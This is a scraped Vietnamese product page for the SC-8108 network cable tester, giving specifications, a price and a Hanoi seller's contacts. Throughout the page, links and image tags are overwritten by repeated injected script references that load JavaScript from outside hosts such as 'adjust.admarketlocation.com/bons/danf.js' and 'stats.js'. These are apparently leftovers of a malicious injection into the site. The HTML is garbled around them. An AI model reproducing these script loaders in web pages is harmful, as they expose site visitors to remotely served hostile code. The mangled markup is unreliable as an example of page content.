Máy Test mạng SC-8108, Đo được số mét cáp

 • Giá thị trường: 1.350.000 đ
  Số lượng

  Mô tả sản phẩm

  Máy test cable Mạng Model (andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/may-test-mang-sc-8108-do-duoc-so-met-cap/”>SC8108) – (3LW8108) RJ 45, RJ 11

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/may-test-mang-sc-8108-do-duoc-so-met-cap/”>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/wp-content/uploads/may-test-mang-do-so-met-SC8108.jpg” alt=”” width=”359″ height=”359″ /> andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/may-test-mang-sc-8108-do-duoc-so-met-cap/”>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/wp-content/uploads/may-test-mang-do-so-met-SC8108-2.jpg” alt=”” width=”366″ height=”375″ />

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/may-test-mang-sc-8108-do-duoc-so-met-cap/”>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/wp-content/uploads/Test-cap-mang-do-so-met-SC8108-2.jpg” alt=”” width=”518″ height=”518″ />

  Màn Hình LCD hiển thị, đo được số mét, số feet trên chiều dài đoạn dây , tính đựơc mét đứt..

  • LCD : 4 x 16 characters big screen (valid visual field 61.6 x 25.2 mm)
  • Type of Tester Cable : STP / UTP twin twisted cable, coaxial cable, telephone line
  • Tester Port :
   Tester RJ45 master port (M), tester LOOPBACK RJ45 port (L), far-end recognizer RJ45 port (R).
   The extra BNC and RJ11 converters are used to measure and check the continuity of coaxial cable and telephone line
  • Length Measurement of Twin Twisted Cable:
   Scope : 1350M (31,200 FT)
   Calibration accuracy : 3% (± 0.5m or ± 1.5 ft) (calibrating cable > 5 M)
   Shipment accuracy : 5% (± 0.5m or ± 1.5 ft) (AMP, AT&T Class 5 cable)
   Display : M or FT
  • Length Calibration : User can set calibration factor by himself by a given length cable. The length of calibrating cable is more than 5M.
  • Wire Sequence and Locating Cable Error : Check errors such as open circuit, short circuit, reverse connection, cross over or cross-talk interference.
  • Locating Cable : Included 1 far-end passive test jack
  • Working Ambient Temperature : -10°C to 60°C
  • Use 4 x AA batteries (Not included)
  • Item size : 180 x 80 x 40 mm

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com”> Máy test mạng SC8108 ,andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&tuyenphuong.com/may-test-mang-sc-8108-do-duoc-so-met-cap/”>máy test cáp, máy test mạng đo độ dài cáp

  Màn hình LCD: Màn hình rộng 4 x 16 ký tự (trường hình ảnh hợp lệ 61,6 x 25,2 mm)
  Loại cáp đo kiểm: cáp xoắn đôi STP / UTP, cáp đồng trục, đường dây điện thoại
  Tester Port:
  Tester cổng chính RJ45 (M), cổng kiểm tra LOOPBACK RJ45 (L), cổng nhận diện xa RJ45 (R).
  and check the continuity of coaxial cable and telephone line     “>Bộ chuyển đổi BNC và RJ11 phụ được sử dụng để đo và kiểm tra sự liên tục của cáp đồng trục và đường dây điện thoại
  Đo chiều dài cáp xoắn đôi:
  Phạm vi: 1350M (31.200 FT)
  Độ chính xác hiệu chuẩn: 3% (± 0.5m hoặc ± 1.5ft) (định cỡ cáp> 5 M)
  Độ chính xác của lô hàng: 5% (± 0.5m hoặc ± 1.5 ft) (AMP, cáp AT & T 5)
  Màn hình: M hoặc FT
  Chiều dài Hiệu chuẩn: Người sử dụng có thể tự thiết lập yếu tố hiệu chuẩn bằng cáp dài nhất định. Chiều dài của cáp hiệu chuẩn là hơn 5M.
  Định vị cáp: Bao gồm 1 cổng kiểm tra thụ động cực trị
  Nhiệt độ môi trường làm việc: -10 ° C đến 60 ° C
  Sử dụng pin AA 4 x (Không bao gồm)
  Kích thước mục: 180 x 80 x 40 mm

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

  CÔNG TY TNHH CÔNG NGHỆ THÔNG TIN TPC

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

  Showroom : Số 02, Ngõ 185 Chùa Láng – Đống Đa – Hà Nội
  Điện Thoại : 024.37668134

  andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/stats.js?t=7&’ type=text/javascript language=javascript>

   Hotline: 0915.0915.33 – 0943.969.919